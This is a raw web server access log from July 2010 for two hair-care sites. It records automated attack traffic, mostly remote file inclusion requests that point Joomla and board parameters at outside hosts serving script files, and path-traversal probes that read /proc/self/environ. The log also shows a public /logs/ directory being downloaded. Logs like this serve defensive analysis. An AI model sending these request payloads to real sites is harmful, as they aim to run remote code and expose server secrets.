85.214.118.239 - - [12/Jul/2010:12:45:24 -0700] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "growlonghairfast.com"
216.18.213.162 - - [12/Jul/2010:12:46:26 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:12:46:26 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:12:51:36 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
81.169.156.197 - - [12/Jul/2010:12:55:31 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.169.156.197 - - [12/Jul/2010:12:59:48 -0700] "GET /logs/access.log/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.169.156.197 - - [12/Jul/2010:12:59:48 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.169.156.197 - - [12/Jul/2010:12:59:48 -0700] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
64.56.67.154 - - [12/Jul/2010:13:07:44 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "page_test (larbin2.6.3@unspecified.mail)" "freehairsecrets.com"
64.56.67.154 - - [12/Jul/2010:13:07:44 -0700] "GET / HTTP/1.0" 200 910 "-" "page_test larbin2.6.3@unspecified.mail" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:13:13:31 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:13:35:01 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
58.22.101.239 - - [12/Jul/2010:13:46:32 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:13:47:36 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:13:47:36 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
67.195.37.176 - - [12/Jul/2010:13:55:19 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:13:57:20 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
195.191.40.23 - - [12/Jul/2010:14:03:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "growlonghairfast.com"
195.191.40.23 - - [12/Jul/2010:14:03:40 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "growlonghairfast.com"
98.165.73.131 - - [12/Jul/2010:14:08:32 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
98.165.73.131 - - [12/Jul/2010:14:08:32 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:14:19:02 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
195.191.40.23 - - [12/Jul/2010:14:20:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)" "freehairsecrets.com"
195.191.40.23 - - [12/Jul/2010:14:20:38 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)" "freehairsecrets.com"
203.252.71.232 - - [12/Jul/2010:14:22:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [12/Jul/2010:14:22:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.38.66.138 - - [12/Jul/2010:14:28:07 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
203.252.71.232 - - [12/Jul/2010:14:28:15 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [12/Jul/2010:14:28:15 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [12/Jul/2010:14:28:16 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [12/Jul/2010:14:28:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [12/Jul/2010:14:28:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [12/Jul/2010:14:28:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
216.104.15.134 - - [12/Jul/2010:14:37:40 -0700] "GET /index.php HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
114.44.1.196 - - [12/Jul/2010:14:39:08 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:14:41:13 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:14:44:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
216.104.15.142 - - [12/Jul/2010:14:47:05 -0700] "GET /logs/access_100705.log//index.php HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
81.169.173.6 - - [12/Jul/2010:14:50:46 -0700] "GET /pingserver.php HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:14:51:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
61.135.134.108 - - [12/Jul/2010:14:53:01 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.134.108 - - [12/Jul/2010:14:53:02 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.134.108 - - [12/Jul/2010:14:53:04 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.134.108 - - [12/Jul/2010:14:53:19 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.134.108 - - [12/Jul/2010:14:53:19 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.134.108 - - [12/Jul/2010:14:53:20 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.169.173.6 - - [12/Jul/2010:15:02:17 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.169.173.6 - - [12/Jul/2010:15:02:17 -0700] "GET /pingserver.php HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.169.173.6 - - [12/Jul/2010:15:02:17 -0700] "GET /logs//pingserver.php HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:15:02:55 -0700] "GET /logs/?D=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:02:59 -0700] "GET /logs/?M=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:04 -0700] "GET /logs/?N=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:08 -0700] "GET /logs/?N=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:13 -0700] "GET /logs/?S=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4134 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:23 -0700] "GET /logs/?M=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:28 -0700] "GET /logs/?N=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:33 -0700] "GET /logs/?N=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:15:03:38 -0700] "GET /logs/?S=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:15:03:45 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
91.212.226.240 - - [12/Jul/2010:15:08:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.240 - - [12/Jul/2010:15:08:05 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.240 - - [12/Jul/2010:15:17:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "freehairsecrets.com"
91.212.226.240 - - [12/Jul/2010:15:17:58 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:18:05 -0700] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:23:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:24:31 -0700] "GET /logs/access.log///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:24:31 -0700] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:24:32 -0700] "GET /logs///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4805 "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:25:28 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:25:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.189.95.54 - - [12/Jul/2010:15:25:28 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:15:26:43 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:15:49:09 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10635 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11100 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11629 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12064 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17990 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5745 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6110 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6522 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7345 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:16:00:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
94.45.33.18 - - [12/Jul/2010:16:04:36 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.freehairsecrets.com"
94.45.33.18 - - [12/Jul/2010:16:04:36 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:16:10:21 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:10:21 -0700] "GET /logs/access_100315.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:10:21 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:10:23 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:10:23 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:10:23 -0700] "GET /logs/access_100315.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
83.143.84.59 - - [12/Jul/2010:16:11:57 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
83.143.84.59 - - [12/Jul/2010:16:13:03 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
83.143.84.59 - - [12/Jul/2010:16:13:03 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
83.143.84.59 - - [12/Jul/2010:16:13:03 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
122.155.3.162 - - [12/Jul/2010:16:16:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:16:19 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:16:19 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:16:20 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:17:13 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:17:13 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:17:13 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
85.25.143.96 - - [12/Jul/2010:16:17:53 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:16:24:57 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:24:57 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:24:57 -0700] "GET /logs/access_100215.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:25:31 -0700] "GET /logs/access_100215.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:25:31 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:16:25:31 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
